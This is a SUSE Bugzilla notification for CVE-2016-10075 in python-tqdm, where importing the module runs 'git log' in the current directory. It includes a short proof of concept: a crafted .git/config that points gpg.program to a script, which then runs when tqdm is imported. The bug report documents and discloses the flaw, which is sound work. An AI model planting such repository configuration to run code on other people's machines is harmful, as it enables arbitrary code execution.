http://bugzilla.suse.com/show_bug.cgi?id=1017485 Bug ID: 1017485 Summary: VUL-0: CVE-2016-10075: python-tqdm,python3-tqdm: insecure use of git Classification: openSUSE Product: openSUSE.org Version: unspecified Hardware: Other URL: https://smash.suse.de/issue/178135/ OS: Other Status: NEW Severity: Normal Priority: P5 - None Component: 3rd party software Assignee: toddrme2178@gmail.com Reporter: astieger@suse.com QA Contact: opensuse-communityscreening@forge.provo.novell.com CC: arun@gmx.de, jmatejek@suse.com, toddrme2178@gmail.com Found By: Security Response Team Blocker: --- When importing tqdm, the tqdm._version module executes the following command: git log -n 1 --oneline This was meant to check if the user is running a pre-release version of tqdm. But cwd might be a part of an unrelated git repository, possibly a malicious one. At least with git 2.10 or later, it's possible to craft a repo in which "git log" executes arbitrary code: $ tail -n4 /tmp/.git/config [log] showSignature = true [gpg] program = /tmp/moogpg $ tail -n4 /tmp/moogpg #!/bin/sh exec > /dev/tty 2>&1 cowsay pwned sleep 9999 $ cd /tmp $ pydoc tqdm _______ < pwned > ------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || Upstream bug report: https://github.com/tqdm/tqdm/issues/328 Affected versions: v4.4.1 and later. devel:languages:python/python-tqdm 4.8.4 devel:languages:python3/python3-tqdm 4.10.10 References: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-10075 http://seclists.org/oss-sec/2016/q4/775 -- You are receiving this mail because: You are on the CC list for the bug.